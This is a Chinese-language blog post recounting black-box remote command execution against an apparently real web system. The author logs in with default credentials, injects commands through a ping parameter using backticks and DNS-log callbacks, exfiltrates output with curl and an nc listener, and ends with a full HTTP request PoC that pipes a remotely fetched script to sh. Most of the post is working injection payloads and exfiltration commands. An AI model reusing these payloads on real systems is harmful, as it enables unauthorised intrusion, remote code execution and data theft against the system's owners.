某次黑盒rce

简介: 看见公众号发了个day 搜了一下发现全网首发这个rce啊 其他地方发的都是任意文件读取 文件读取嘛 这个洞没啥太大的卵用 其实 但我看到是php的系统 任意文件读取有时候还是能出货的 读点源码审一下还是可以的

background

看见公众号发了个day 搜了一下发现全网首发这个rce啊 其他地方发的都是任意文件读取 文件读取嘛 这个洞没啥太大的卵用 其实 但我看到是php的系统 任意文件读取有时候还是能出货的 读点源码审一下还是可以的

image.png

这个rce的poc要钱 其他有的公众号文件读取的还是不要钱的

image.png

fuzz

这里主要记录自己测试的过程

准备读点代码来看的 但是运气很好 一来就若进去了一个系统

admin 123456 yyds

image.png

这输入不了 是因为我之前fuzz的时候整废了 这个口子命令有问题就废了 只是前端废了 输入不了了

正常发两个包 

image.png

看看数据包

image.png

正常fuzz

addr_value=219&pingname=127.0.0.1|whoami&pingtime=2&packetsize=1
addr_value=219&pingname=127.0.0.1;whoami&pingtime=2&packetsize=1

没反应 回显是白的 前端还卡死了

盲打ping dns

addr_value=219&pingname=127.0.0.1|ping 222.k07niu.dnslog.cn&pingtime=2&packetsize=1
addr_value=219&pingname=127.0.0.1;ping 222.k07niu.dnslog.cn&pingtime=2&packetsize=1

没反应 一般在这里我以前可能会觉得没货了

这里我直接打一下

addr_value=219&pingname=2222.o6cdky.dnslog.cn&pingtime=2&packetsize=1

dns没货 但是奇怪的是本地竟然有结果

image.png

不知道为什么这里dns没货 明明已经解析dns了呀 咋没记录

但是这里发现二级域名是可以回显的

addr_value=219&pingname=`whoami`.o6cdky.dnslog.cn&pingtime=2&packetsize=1

出货

image.png

addr_value=219&pingname=`ping qqq.24i49v.dnslog.cn`.o6cdky.dnslog.cn&pingtime=2&packetsize=1

于是呼反引号里面再打 但是没货啊

就在这里执行命令了,但是很多命令没法执行呀 这个回显太奇葩了 很多东西都显示不出来 

测了一下正常域名这里是出网的 那干脆打一下vps

addr_value=219&pingname=`curl x.x.x.x:1234`.o6cdky.dnslog.cn&pingtime=2&packetsize=1

出货了 那就直接oob?

python3 -m http.server

里面内容放 文件名1

curl http://xxxx:8000/2`ls -al >1.txt`

然后在搞另一个文件 把结果带出去 文件名2

curl -X POST -F xx=@1.txt http://xxxxx:8001


nc起一个端口

nc -l 8001

burp里发包

addr_value=219&pingname=`curl xxxxx:8000/1|sh`.o6cdky.dnslog.cn&pingtime=2&packetsize=1

首先会访问1里面的内容并且执行 1里就直接把命令结果写到1.txt了 接着访问2 执行传1.txt的操作

image.png

至此 出货 成功外带数据 但这个站不是php写的 不知道公众号的这些东西是怎么来的

image.png

完整poc

POST /main/deal HTTP/1.1
Host: 
Content-Length: 95
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

addr_value=219&pingname=`curl x.x.x.x:8000/2|sh`.o6cdky.dnslog.cn&pingtime=2&packetsize=1
相关文章
|
8月前
|
安全 JavaScript 前端开发
Web安全-逻辑错误漏洞
Web安全-逻辑错误漏洞
50 1
|
存储 设计模式 安全
渗透攻击实例-设计缺陷/逻辑错误
渗透攻击实例-设计缺陷/逻辑错误
|
安全 Shell PHP
干货 | 命令执行(RCE)面对各种过滤,骚姿势绕过总结
干货 | 命令执行(RCE)面对各种过滤,骚姿势绕过总结
1624 0
|
XML Web App开发 安全
脚本小子是如何复现漏洞(CVE-2021-22986)并实现批量利用
脚本小子是如何复现漏洞(CVE-2021-22986)并实现批量利用
|
安全 API 开发工具
恶意代码分析系列-几种常用技术(1)
恶意代码分析系列-几种常用技术(1)
|
安全 API 数据库
恶意代码分析系列-几种常用技术(3)
恶意代码分析系列-几种常用技术(3)
|
安全 API Windows
恶意代码分析系列-几种常用技术(2)
恶意代码分析系列-几种常用技术(2)
|
安全 开发者
8个迹象表明你在重大IT项目上时机不对
8个迹象表明你在重大IT项目上时机不对
152 0
|
云安全 存储 监控
Gitlab远程代码执行漏洞(CVE-2021-22205)在野利用,8220挖矿团伙最新变种分析
阿里云安全监测到Gitlab远程代码执行(CVE-2021-22205)在野利用,其团伙不仅利用4层协议服务进行入侵,还集成了使用比较广的Web RCE漏洞。
1010 0
Gitlab远程代码执行漏洞(CVE-2021-22205)在野利用,8220挖矿团伙最新变种分析
|
安全
代码执行漏洞原理/防御
原理 代码执行漏洞是指 攻击者利用 将字符串转化成代码的函数 , 进行代码注入
654 0